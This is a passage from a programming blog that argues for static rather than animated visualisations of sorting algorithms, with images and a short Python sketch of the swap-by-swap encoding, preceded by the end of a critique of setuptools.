And no, using the setuptools development mode magic is not a satisfactory answer.</li> </ul> <p>This type of intrusive design is disrespectful to users. Whenever you prefer to trust your own imperfect guesses, rather than letting the user specify what they want, you are disrespectful to your users. Whenever you needlessly make a system obscure to inspection, you are disrespectful to your users. Whenever you allow your software to spill beyond its rightful bounds (by, for example, getting intimate with my version control system), you are disrespectful to your users.</p> <p>I believe that most people use setuptools because it provides a few simple pieces of functionality that could easily be added to distutils without the dross and bad design. Grafting dependencies and better package data management onto distutils would go about 80% of the way to meeting my modest expectations. Sadly, in one of those minor tragedies that life is so full of, it appears that setuptools <a href="http://mail.python.org/pipermail/python-dev/2006-April/063964.html">wins by default</a>, simply because the problem domain is so goddamn boring that no-one else has bothered.</p> Visualising Sorting Algorithms 2007-04-27T00:00:00+00:00 2007-04-27T00:00:00+00:00 https://corte.si/posts/code/visualisingsorting/ <p><strong>Update</strong> See <a rel="external" href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p> <p>I dislike <a href="http://ftp.csci.csusb.edu/public/class/cs455/cs455_2000/java/InsertionSortLauncher.html">animated</a> <a href="http://www.cs.ubc.ca/~harrison/Java/sorting-demo.html">sorting</a> <a href="http://www2.hawaii.edu/~copley/665/HSApplet.html">algorithm</a> <a href="http://en.wikipedia.org/wiki/Image:Sorting_heapsort_anim.gif">visualisations</a> - there's too much of an air of hocus-pocus about them. Something impressive and complicated happens on screen, but more often than not the audience is left mystified. 
I think their creators must also know that they have precious little explanatory value, because the better ones are sexed up with play-by-play doodles, added, one feels, as an apologetic afterthought by some particularly dorky sportscaster. Nevertheless I've been unable to find a single attempt to visualise a sorting algorithm statically (if you know of any, please drop me a line).</p> <p>So, presented below are the results of a pleasant evening with some nice Scotch and the third volume of Knuth. First, here's a taster - a static visualisation of heapsort:</p> <div class="media"> <a href="heap.png"> <img src="heap.png" /> </a> <div class="subtitle"> Heapsort </div> </div> <p>I think these simple static visualisations are much clearer than most animated attempts - and they have the added benefit of also being, to my not entirely unbiased eye, rather beautiful. You will find more visualisations, source code, and a tediously long explanation of why I bothered, after the jump.</p> <h2 id="the-problem">The Problem</h2> <p>Before I go on, though, bear with me while I press home my point about animation with a particularly heinous example of the genre. I found the following specimen on the <a href="http://en.wikipedia.org/wiki/Bubblesort">Wikipedia page for Bubblesort</a>:</p> <div class="media"> <a href="bubble_sort_animation.gif"> <img src="bubble_sort_animation.gif" /> </a> <div class="subtitle"> Bubblesort visualisation from Wikipedia </div> </div> <p>Now, it is my measured opinion that this animation has all the explanatory power of a glob of porridge flung against a wall. To see why I say this, try to find rough answers to the following set of simple questions with reference to it:</p> <ul> <li>After what percentage of time is half of the array sorted?</li> <li>Can you find an element that moved about half the length of the array to reach its final destination?</li> <li>What percentage of the array was sorted after 80% of the sorting process? 
How about 20%?</li> <li>Does the number of sorted elements grow linearly or non-linearly with time (i.e. logarithmically or exponentially)?</li> </ul> <p>If you thought that was harder than it needed to be, blame animation. First, while humans are great at estimating distances in space, they are pretty bad at estimating distances in time. This is why you had to watch the animation two or three times to answer the first question. When we translate time to a geometric length, as is done in any scientific diagram with a time dimension, this estimation process becomes easy. Second, many questions about sorting algorithms require us to actively compare the sorting state at two or more different time points. Since we don't have perfect memories, this is very, very hard in all but the simplest cases. This leaves us with a strangely one-dimensional view into an animation - we can see what's on screen at any given moment, but we have to strain to answer simple questions about, say, rates of change. Which is why the final question is hard to answer accurately.</p> <h2 id="finding-flatland">Finding Flatland</h2> <p>It turns out that it is pretty easy to find a static, two-dimensional encoding for the sorting process. The specific technique used here only works when the sorting algorithm is in-place, i.e. does not use any storage external to the array itself. Some of the algorithms below have been slightly modified from their standard forms to make sure they have this property. The magnitude of a number is indicated by shading - higher numbers are darker, and lower numbers are lighter. We begin on the left hand side with the numbers in a random order, and the sorting progression plays out until we reach the right hand side with a sorted sequence. Time, in this particular case, is measured by the number of "swaps" performed. This means that all swaps are equidistant on the diagram, and that only a single swap occurs at any point in time. 
When I refer to "time" when talking about these diagrams, I am therefore not referring to clock time.</p> <p>Now, I should be clear at the outset that I haven't tried to pack these diagrams with as much information as possible. For example, I don't include tick marks for time units, nor do I explicitly mark algorithm details like Instead, I've simply tried to produce images that give a clear sense of the "flow" over time of the algorithms, while simultaneously not being an eyesore. I might produce some scaled-up annotated versions of the diagrams for some future post.</p> <h2 id="bubblesort">Bubblesort</h2> <div class="media"> <a href="bubble.png"> <img src="bubble.png" /> </a> <div class="subtitle"> Bubble sort </div> </div> <p>So, let's start with a static visualisation of <a href="http://en.wikipedia.org/wiki/Bubble_sort">bubblesort</a>. Notice that, even without any labelling, we can "read off" the answers to all the questions posed above pretty trivially:</p> <ul> <li>The sorted portion of the sequence is clearly visible as a triangular block in the bottom-right of the image, so we can easily locate the point at which half the array is sorted, and read off the percentage of time taken.</li> <li>Since the start and end positions of each element are visible on the graph, finding an element that moved about 50% of the length of the array is simple.</li> <li>Similarly, the percentage of the array that is sorted at 20% and 80% of the process can just be read off.</li> <li>Lastly, we can clearly see that the curve of sorted elements is not linear, but is probably close to n^2.</li> </ul> <p>Other features of the algorithm are also clearer - for instance, the famous "rabbits" and "turtles" are clearly identifiable. 
In the diagram the "rabbits" are the dark lines sweeping down to their positions rapidly, and the turtles are the lighter lines that gradually curve towards the top right of the image.</p> <h2 id="heapsort">Heapsort</h2> <div class="media"> <a href="heap.png"> <img src="heap.png" /> </a> <div class="subtitle"> Heapsort </div> </div> <p>Now, let's return to the <a href="http://en.wikipedia.org/wiki/Heapsort">heapsort</a> image at the top of this article. First, a quick (and superficial) refresher on the algorithm itself:</p> <ul> <li>Step 1: Arrange the elements in the array to form a "heap" - a data structure that allows us to find the largest element in constant time.</li> <li>Step 2: Peel off the largest element, and move it to below the heap.</li> <li>Step 3: The heap is now disrupted, so we do some work to re-establish the heap property.</li> <li>Step 4: Repeat steps 2-3 until the entire array is sorted.</li> </ul> <p>Looking at the visualisation, we can see Step 1 clearly - it is the portion of the diagram before the point where the largest element in the array is slotted into place. After that, we can see a repeated pattern - the heap is re-established and the greatest element is moved to below the heap again and again until the array is sorted.</p> <p>We can immediately make some quite sophisticated observations. For example, we can see that although initially establishing the heap is costly, re-establishing it after the greatest element is removed requires an approximately constant amount of time throughout the sorting process - meaning that the time required is relatively independent of the number of items still in the heap. This is an interesting property that is not immediately obvious from an analysis of the algorithm itself.</p> <p>Right - enough prattling! 
Here is a selection of other visualised algorithms for your viewing pleasure:</p> <h2 id="quicksort">Quicksort</h2> <div class="media"> <a href="quick.png"> <img src="quick.png" /> </a> <div class="subtitle"> Quicksort </div> </div><h2 id="selection-sort">Selection Sort</h2> <div class="media"> <a href="selection.png"> <img src="selection.png" /> </a> <div class="subtitle"> Selection sort </div> </div><h2 id="insertion-sort">Insertion Sort</h2> <div class="media"> <a href="listinsertion.png"> <img src="listinsertion.png" /> </a> <div class="subtitle"> Insertion sort </div> </div><h2 id="shell-sort">Shell Sort</h2> <div class="media"> <a href="shell.png"> <img src="shell.png" /> </a> <div class="subtitle"> Shell sort </div> </div><h2 id="the-code">The Code</h2> <p><a href="visualise.py">visualise.py</a></p> <p>This whole thing started partly as an excuse to get familiar with the <a href="http://cairographics.org">Cairo</a> graphics library. It produces beautiful, clean images, and appears to be both portable and well designed. It also comes with a set of Python bindings that are maintained as part of the project itself - a big plus in my books. Firefox 3 will use Cairo as its standard rendering back end, which will instantly make it one of the most widely used vector graphics libraries out there.</p> <p>The examples on this page were generated using a command somewhat like the following:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./visualise.py</span><span style="color: #005CC5;"> -l 6 -x 700 -y 300 -n 15</span></span></code></pre> <p><strong>Update 9/8/09</strong>: A newer version of the code is now available on <a href="http://github.com/cortesi/sortvis/tree/master">github</a>. 
You can check it out like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/sortvis.git</span></span></code></pre>
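<p>If you just want a feel for the encoding described under "Finding Flatland" without reading either codebase, here is a minimal sketch. It is not taken from visualise.py or sortvis - the function names are made up for illustration, and it assumes the input is a shuffled list of the distinct integers 0 to n-1. It records one snapshot of the array per swap, so a snapshot's index is its "time", and then turns those snapshots into one position-over-time trajectory per element, shaded by magnitude.</p>

```python
def bubble_sort_states(values):
    """Bubble-sort a copy of values, returning one snapshot per swap.

    states[0] is the initial order; each later entry is the array
    immediately after a single swap, so the list index doubles as "time".
    """
    a = list(values)
    states = [list(a)]
    for end in range(len(a) - 1, 0, -1):
        for j in range(end):
            if a[j] > a[j + 1]:
                a[j], a[j + 1] = a[j + 1], a[j]
                states.append(list(a))
    return states


def trajectories(states):
    """Map each (distinct) value to its array position at every time step."""
    return {v: [s.index(v) for s in states] for v in states[0]}


def shade(value, n):
    """Grey level for one of n distinct values 0..n-1 (0.0 black, 1.0 white).

    Higher numbers come out darker, matching the diagrams above.
    """
    return 1.0 - value / (n - 1)
```

<p>Each trajectory can then be drawn as a line with the time step on the horizontal axis and the array position on the vertical axis, using whatever drawing library you prefer. For the input [3, 1, 2, 0], bubblesort performs five swaps, so the sketch yields six snapshots.</p>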